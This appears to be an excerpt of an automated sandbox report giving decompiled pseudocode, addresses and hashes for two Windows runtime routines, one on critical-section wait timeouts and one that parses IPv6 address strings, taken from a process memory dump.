                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E01F9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                        				signed int _v36;
                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                        				short _v66;
                                                                                                                                                        				char _v72;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                        				signed int _t44;
                                                                                                                                                        				void* _t46;
                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                        				signed char _t67;
                                                                                                                                                        				void* _t72;
                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                        				void* _t91;
                                                                                                                                                        				void* _t92;
                                                                                                                                                        				void* _t93;
                                                                                                                                                        
                                                                                                                                                        				_t80 = __edi;
                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                        				_t70 = __ecx;
                                                                                                                                                        				_t84 = _a4;
                                                                                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                        					E01F8DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                        				}
                                                                                                                                                        				_push(0);
                                                                                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                                                                                        				if(_t38 == 0xffffffff) {
                                                                                                                                                        					_t39 =  *0x205793c; // 0x0
                                                                                                                                                        					_push(0);
                                                                                                                                                        					_push(_t84);
                                                                                                                                                        					_t40 = E01F716C0(_t39);
                                                                                                                                                        				} else {
                                                                                                                                                        					_t40 = E01F6F9D4(_t38);
                                                                                                                                                        				}
                                                                                                                                                        				_pop(_t85);
                                                                                                                                                        				__eflags = _t40;
                                                                                                                                                        				if(__eflags < 0) {
                                                                                                                                                        					_push(_t40);
                                                                                                                                                        					E01FB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                        					asm("int3");
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L21:
                                                                                                                                                        						_t76 =  *[fs:0x18];
                                                                                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                        							_v66 = 0x1722;
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_t76 =  &_v72;
                                                                                                                                                        							_push( &_v72);
                                                                                                                                                        							_v28 = _t85;
                                                                                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(0x10);
                                                                                                                                                        							_push(0x20402);
                                                                                                                                                        							E01F701A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_t43 = _v8;
                                                                                                                                                        							_push(_t80);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                                                                                        							if(_t43 == 0xffffffff) {
                                                                                                                                                        								_t71 =  *0x205793c; // 0x0
                                                                                                                                                        								_push(_t85);
                                                                                                                                                        								_t44 = E01F71F28(_t71);
                                                                                                                                                        							} else {
                                                                                                                                                        								_t44 = E01F6F8CC(_t43);
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t44 - 0x102;
                                                                                                                                                        							if(_t44 != 0x102) {
                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t44);
                                                                                                                                                        									E01FB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									E01FF2306(_t85);
                                                                                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                                                                                        										_t72 = _t7;
                                                                                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                        										__eflags = _t67 - _t67;
                                                                                                                                                        										if(_t67 == _t67) {
                                                                                                                                                        											E01F9EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v24;
                                                                                                                                                        									if(_v24 != 0) {
                                                                                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                        									}
                                                                                                                                                        									return 2;
                                                                                                                                                        								}
                                                                                                                                                        								goto L36;
                                                                                                                                                        							}
                                                                                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                        							_push(_t67);
                                                                                                                                                        							_t46 = E01FB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                        							_push(_t77);
                                                                                                                                                        							E01FC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                        							_t48 =  *_t85;
                                                                                                                                                        							_t92 = _t91 + 0x18;
                                                                                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                                                                                        							if(_t48 == 0xffffffff) {
                                                                                                                                                        								_t49 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                        							_push(_t49);
                                                                                                                                                        							_t50 = _v12;
                                                                                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                        							_push(_t85);
                                                                                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                        							E01FC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                        							_t53 =  *_t85;
                                                                                                                                                        							_t93 = _t92 + 0x20;
                                                                                                                                                        							_t67 = _t67 + 1;
                                                                                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                                                                                        							if(_t53 != 0xffffffff) {
                                                                                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t67 - 2;
                                                                                                                                                        							if(_t67 > 2) {
                                                                                                                                                        								__eflags = _t85 - 0x20520c0;
                                                                                                                                                        								if(_t85 != 0x20520c0) {
                                                                                                                                                        									_t76 = _a4;
                                                                                                                                                        									__eflags = _a4 - _a8;
                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                        										E01FF217A(_t71, __eflags, _t85);
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0x65);
                                                                                                                                                        							_a8 = _a4;
                                                                                                                                                        							E01FC3F92();
                                                                                                                                                        							_t91 = _t93 + 0xc;
                                                                                                                                                        							__eflags =  *0x7ffe0382;
                                                                                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                                                                                        								goto L21;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t40;
                                                                                                                                                        				}
                                                                                                                                                        				L36:
                                                                                                                                                        			}

































                                                                                                                                                        0x01fd243c
                                                                                                                                                        0x01fd243f
                                                                                                                                                        0x01fd2442
                                                                                                                                                        0x01fd2443
                                                                                                                                                        0x01fd2446
                                                                                                                                                        0x01fd2449
                                                                                                                                                        0x01fd2453
                                                                                                                                                        0x01fd2455
                                                                                                                                                        0x01fd245b
                                                                                                                                                        0x01fd245b
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9eb9c
                                                                                                                                                        0x01f9eb9d
                                                                                                                                                        0x01f9eb9f
                                                                                                                                                        0x01f9eba2
                                                                                                                                                        0x01fd2465
                                                                                                                                                        0x01fd246b
                                                                                                                                                        0x01fd246d
                                                                                                                                                        0x01f9eba8
                                                                                                                                                        0x01f9eba9
                                                                                                                                                        0x01f9eba9
                                                                                                                                                        0x01f9ebae
                                                                                                                                                        0x01f9ebb3
                                                                                                                                                        0x01f9ebb9
                                                                                                                                                        0x01f9ebbb
                                                                                                                                                        0x01fd2513
                                                                                                                                                        0x01fd2514
                                                                                                                                                        0x01fd2519
                                                                                                                                                        0x01fd251b
                                                                                                                                                        0x01f9ec2a
                                                                                                                                                        0x01f9ec2d
                                                                                                                                                        0x01f9ec33
                                                                                                                                                        0x01f9ec36
                                                                                                                                                        0x01f9ec3a
                                                                                                                                                        0x01f9ec3e
                                                                                                                                                        0x01f9ec40
                                                                                                                                                        0x01f9ec47
                                                                                                                                                        0x01f9ec47
                                                                                                                                                        0x01f9ec40
                                                                                                                                                        0x01f722c6
                                                                                                                                                        0x01f9ebc1
                                                                                                                                                        0x01f9ebc1
                                                                                                                                                        0x01f9ebc5
                                                                                                                                                        0x01f9ec9a
                                                                                                                                                        0x01f9ec9a
                                                                                                                                                        0x01f9ebd6
                                                                                                                                                        0x01f9ebd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9ebbb
                                                                                                                                                        0x01fd2477
                                                                                                                                                        0x01fd247c
                                                                                                                                                        0x01fd2486
                                                                                                                                                        0x01fd248b
                                                                                                                                                        0x01fd2496
                                                                                                                                                        0x01fd249b
                                                                                                                                                        0x01fd249d
                                                                                                                                                        0x01fd24a0
                                                                                                                                                        0x01fd24a3
                                                                                                                                                        0x01fd24aa
                                                                                                                                                        0x01fd24aa
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24a5
                                                                                                                                                        0x01fd24ac
                                                                                                                                                        0x01fd24af
                                                                                                                                                        0x01fd24b0
                                                                                                                                                        0x01fd24b3
                                                                                                                                                        0x01fd24b9
                                                                                                                                                        0x01fd24ba
                                                                                                                                                        0x01fd24bb
                                                                                                                                                        0x01fd24c6
                                                                                                                                                        0x01fd24cb
                                                                                                                                                        0x01fd24cd
                                                                                                                                                        0x01fd24d0
                                                                                                                                                        0x01fd24d1
                                                                                                                                                        0x01fd24d4
                                                                                                                                                        0x01fd24d6
                                                                                                                                                        0x01fd24d9
                                                                                                                                                        0x01fd24d9
                                                                                                                                                        0x01fd24dc
                                                                                                                                                        0x01fd24df
                                                                                                                                                        0x01fd24e1
                                                                                                                                                        0x01fd24e7
                                                                                                                                                        0x01fd24e9
                                                                                                                                                        0x01fd24ec
                                                                                                                                                        0x01fd24ef
                                                                                                                                                        0x01fd24f2
                                                                                                                                                        0x01fd24f2
                                                                                                                                                        0x01fd24ef
                                                                                                                                                        0x01fd24e7
                                                                                                                                                        0x01fd24fa
                                                                                                                                                        0x01fd24ff
                                                                                                                                                        0x01fd2501
                                                                                                                                                        0x01fd2503
                                                                                                                                                        0x01fd2506
                                                                                                                                                        0x01fd250b
                                                                                                                                                        0x01f9eb8c
                                                                                                                                                        0x01f9eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FD24BD
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 01FD24FA
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FD248D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                        • Instruction ID: 603ae29aa05632830ad76e2e9360052b06ac5c0c235692252f73631b10647e54
                                                                                                                                                        • Opcode Fuzzy Hash: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                        • Instruction Fuzzy Hash: BA410A71A00705EBDB20EF68CD84F7A77B9EF45720F148605FA559B2C2D632E941C7A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E01FAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _t105;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				char _t114;
                                                                                                                                                        				short _t115;
                                                                                                                                                        				void* _t118;
                                                                                                                                                        				signed short* _t119;
                                                                                                                                                        				short _t120;
                                                                                                                                                        				char _t122;
                                                                                                                                                        				void* _t127;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        				signed int _t136;
                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                        				signed int _t158;
                                                                                                                                                        				signed short* _t164;
                                                                                                                                                        				signed int _t167;
                                                                                                                                                        				void* _t170;
                                                                                                                                                        
                                                                                                                                                        				_t158 = 0;
                                                                                                                                                        				_t164 = _a4;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_t136 = 0;
                                                                                                                                                        				while(1) {
                                                                                                                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                        					if(_t167 == _t158) {
                                                                                                                                                        						break;
                                                                                                                                                        					}
                                                                                                                                                        					_t118 = _v20 - _t158;
                                                                                                                                                        					if(_t118 == 0) {
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        								_v28 = 1;
                                                                                                                                                        								_v8 = _t143;
                                                                                                                                                        								_t136 = _t136 + 1;
                                                                                                                                                        								L47:
                                                                                                                                                        								_t164 = _t119;
                                                                                                                                                        								_v20 = _t143;
                                                                                                                                                        								L14:
                                                                                                                                                        								if(_v24 == _t158) {
                                                                                                                                                        									L19:
                                                                                                                                                        									_t164 =  &(_t164[1]);
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v12 == _t158) {
                                                                                                                                                        									if(_v16 > 4) {
                                                                                                                                                        										L29:
                                                                                                                                                        										return 0xc000000d;
                                                                                                                                                        									}
                                                                                                                                                        									_t120 = E01FAEE02(_v24, _t158, 0x10);
                                                                                                                                                        									_t170 = _t170 + 0xc;
                                                                                                                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                        									_t136 = _t136 + 1;
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v16 > 3) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								_t122 = E01FAEE02(_v24, _t158, 0xa);
                                                                                                                                                        								_t170 = _t170 + 0xc;
                                                                                                                                                        								if(_t122 > 0xff) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                        								goto L19;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L21:
                                                                                                                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							if(E01FA685D(_t167, 4) == 0) {
                                                                                                                                                        								if(E01FA685D(_t167, 0x80) != 0) {
                                                                                                                                                        									if(_v12 > 0) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t127 = 1;
                                                                                                                                                        									_a7 = 1;
                                                                                                                                                        									_v24 = _t164;
                                                                                                                                                        									_v20 = 1;
                                                                                                                                                        									_v16 = 1;
                                                                                                                                                        									L36:
                                                                                                                                                        									if(_v20 == _t127) {
                                                                                                                                                        										goto L19;
                                                                                                                                                        									}
                                                                                                                                                        									_t158 = 0;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v24 = _t164;
                                                                                                                                                        							_v20 = 1;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							goto L19;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t130 = _t118 - 1;
                                                                                                                                                        					if(_t130 != 0) {
                                                                                                                                                        						if(_t130 == 1) {
                                                                                                                                                        							goto L21;
                                                                                                                                                        						}
                                                                                                                                                        						_t127 = 1;
                                                                                                                                                        						goto L36;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t167 >= 0x80) {
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t167 == 0x3a) {
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t119 =  &(_t164[1]);
                                                                                                                                                        								if( *_t119 != _t167) {
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									L13:
                                                                                                                                                        									_v20 = _t158;
                                                                                                                                                        									goto L14;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v28 != 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								_v28 = _v8 + 1;
                                                                                                                                                        								_t143 = 2;
                                                                                                                                                        								_v8 = _v8 + _t143;
                                                                                                                                                        								goto L47;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                        							break;
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							_t158 = 0;
                                                                                                                                                        							goto L13;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(E01FA685D(_t167, 4) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					if(E01FA685D(_t167, 0x80) != 0) {
                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                        						if(_v12 > 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_a7 = 1;
                                                                                                                                                        						goto L19;
                                                                                                                                                        					}
                                                                                                                                                        					goto L7;
                                                                                                                                                        				}
                                                                                                                                                        				 *_a8 = _t164;
                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                        					if(_v12 != 3) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                        					if(_v20 != 1) {
                                                                                                                                                        						if(_v20 != 2) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                        						L65:
                                                                                                                                                        						_t105 = _v28;
                                                                                                                                                        						if(_t105 != 0) {
                                                                                                                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                        							E01F88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                        							_t110 = 8;
                                                                                                                                                        							E01F7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                        						if(_v16 > 3) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						_t114 = E01FAEE02(_v24, 0, 0xa);
                                                                                                                                                        						_t170 = _t170 + 0xc;
                                                                                                                                                        						if(_t114 > 0xff) {
                                                                                                                                                        							goto L29;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                        						goto L65;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v16 > 4) {
                                                                                                                                                        						goto L29;
                                                                                                                                                        					}
                                                                                                                                                        					_t115 = E01FAEE02(_v24, 0, 0x10);
                                                                                                                                                        					_t170 = _t170 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                        					goto L65;
                                                                                                                                                        				} else {
                                                                                                                                                        					goto L29;
                                                                                                                                                        				}
                                                                                                                                                        			}


























                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: d2f2cb8100af77b868a69a99b2a040054c5078c8bd814cde7ba8e4eb19fe2db0
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 7091D1B1D0020AEEDF25CF58C8856FEBBB4FF40704FA4806AD651AB252E7364A41CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%